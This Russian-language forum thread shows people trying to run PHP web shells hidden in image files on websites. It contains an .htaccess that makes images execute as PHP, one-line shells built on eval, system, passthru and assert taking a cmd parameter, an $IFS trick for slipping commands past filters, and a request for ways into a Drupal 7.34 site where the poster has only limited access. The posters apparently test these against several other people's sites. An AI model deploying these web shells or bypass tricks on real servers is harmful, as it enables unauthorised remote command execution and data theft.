$IFS defaults to whitespace (space, tab, and newline), but may be changed, for example, to parse a comma-separated data file. Note that $* uses the first character held in $IFS. Code: ls$IFS-la
Уже на нескольких сайтах перепробовал, везде при запросе Code: http://сайт/картинка.gif?cmd=phpinfo(); открывается просто картинка. В чем может быть причина?
А может подскажите как получить доступ к файлам если установлен Drupal 7.34, нет доступа к mysql, есть доступ к админке под юзером, где нет возможности не загрузить ни картинку ни модуль..
Залит файл .htaccess, содержимое следующее: Code: AddType application/x-httpd-php .jpg .gif AddHandler application/x-httpd-php .jpg .gif <IfModule mod_mime.c> AddType application/x-httpd-php .jpg .gif </IfModule> <FilesMatch "\.(jpg|gif|png|bmp)$"> SetHandler application/x-httpd-php </FilesMatch> img.jpg (внутри обычный код шелла 96kb) > Изображение "img.jpg" не может быть показано, так как содержит ошибки. img2_exif.jpg?cmd=phpinfo(); [ Внутри комментарий <?eval($_GET[cmd])?> ] > Открывается обычная картинка, больше ничего не происходит. img.gif?cmd=phpinfo(); [ Внутри комментарий <?assert($_REQUEST[cmd])?> ] > Открывается обычная картинка 1px, больше ничего не происходит. Тестирую на своём хостинге, если же просто залить img.php с содержимым: Code: + <?eval($_GET[cmd])?> + <?eval($_REQUEST[cmd])?> <?passthru($_GET[cmd])?> <?passthru($_REQUEST[cmd])?> <?system($_GET[cmd])?> <?system($_REQUEST[cmd])?> + <?assert($_GET[cmd])?> + <?assert($_REQUEST[cmd])?> И перейти по img.php?cmd=phpinfo(); [ Всё отлично работает, пробовал разный код, плюсами выделил с которыми всё работает ] Характеристики: PHP Version 5.6.36 / Apache 2.2.15 (CentOS) Куда копать и почему не работает? Браузеры разные пробовал, думал дело в них...
